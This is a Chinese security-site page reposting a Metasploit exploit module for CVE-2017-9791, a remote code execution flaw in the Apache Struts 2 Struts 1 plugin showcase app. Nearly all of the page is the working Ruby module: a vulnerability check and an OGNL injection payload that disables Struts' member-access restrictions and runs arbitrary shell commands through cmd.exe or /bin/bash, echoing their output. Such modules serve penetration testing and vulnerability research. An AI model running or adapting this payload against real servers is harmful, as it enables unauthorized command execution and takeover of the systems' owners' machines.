首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit)
来源:metasploit.com 作者:icez 发布时间:2018-05-18  

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution',
      'Description'    => %q{ This module exploits a remote code execution vulnerability in the Struts Showcase app in the Struts 1 plugin example in Struts 2.3.x series. Remote Code Execution can be performed via a malicious field value. },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'icez <ic3z at qq dot com>',
        'Nixawk',
        'xfer0'
      ],
      'References'     => [
        [ 'CVE', '2017-9791' ],
        [ 'BID', '99484' ],
        [ 'EDB', '42324' ],
        [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-048'  ]
      ],
      'Privileged'     => true,
      'Targets'        => [
        [
          'Universal', {
            'Platform'       => %w{ linux unix win },
            'Arch'           => [ ARCH_CMD ]
          }
        ]
      ],
      'DisclosureDate' => 'Jul 07 2017',
    'DefaultTarget'  => 0))
 
    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/integration/saveGangster.action' ]),
        OptString.new('POSTPARAM', [ true, 'The HTTP POST parameter', 'name' ])
      ]
    )
  end
 
  def send_struts_request(ognl)
    var_a = rand_text_alpha_lower(4)
    var_b = rand_text_alpha_lower(4)
    uri = normalize_uri(datastore['TARGETURI'])
 
    data = {
      datastore['POSTPARAM']    => ognl,
      'age'                     => var_a,
      '__checkbox_bustedBefore' => 'true',
      'description'             => var_b
    }
 
    resp = send_request_cgi({
      'uri'       => uri,
      'method'    => 'POST',
      'vars_post' => data
    })
 
    if resp && resp.code == 404
      fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
    end
    resp
  end
 
  def check
    var_a = rand_text_alpha_lower(4)
    var_b = rand_text_alpha_lower(4)
    ognl = "%{'#{var_a}' + '#{var_b}'}"
 
    begin
      resp = send_struts_request(ognl)
    rescue Msf::Exploit::Failed
      return Exploit::CheckCode::Unknown
    end
 
    if resp && resp.code == 200 && resp.body.include?("#{var_a}#{var_b}")
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end
 
  def exploit
    resp = exec_cmd(payload.encoded)
    unless resp and resp.code == 200
      fail_with(Failure::Unknown, "Exploit failed.")
    end
 
    print_good("Command executed")
    print_line(resp.body)
  end
 
  def exec_cmd(cmd)
    ognl = "%{(#_='multipart/form-data')."
    ognl << "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    ognl << "(#_memberAccess?(#_memberAccess=#dm):"
    ognl << "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    ognl << "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    ognl << "(#ognlUtil.getExcludedPackageNames().clear())."
    ognl << "(#ognlUtil.getExcludedClasses().clear())."
    ognl << "(#context.setMemberAccess(#dm))))."
    ognl << "(#cmd='#{cmd}')."
    ognl << "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    ognl << "(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start())."
    ognl << "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    ognl << "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
 
    send_struts_request(ognl)
  end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Jenkins CLI - HTTP Java Deseri
·AF_PACKET packet_set_ring Priv
·Linux < 4.16.9 / < 4.14.41 - 4
·HPE iMC 7.3 - Remote Code Exec
·Nanopool Claymore Dual Miner 7
·Prime95 29.4b8 - Stack Buffer
·Intelbras NCLOUD 300 1.0 - Aut
·DynoRoot DHCP - Client Command
·Inteno IOPSYS 2.0 < 4.2.0 - 'p
·Microsoft Edge Chakra JIT - Bo
·WhatsApp 2.18.31 iOS Memory Co
·Easy MPEG to DVD Burner 1.7.11
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved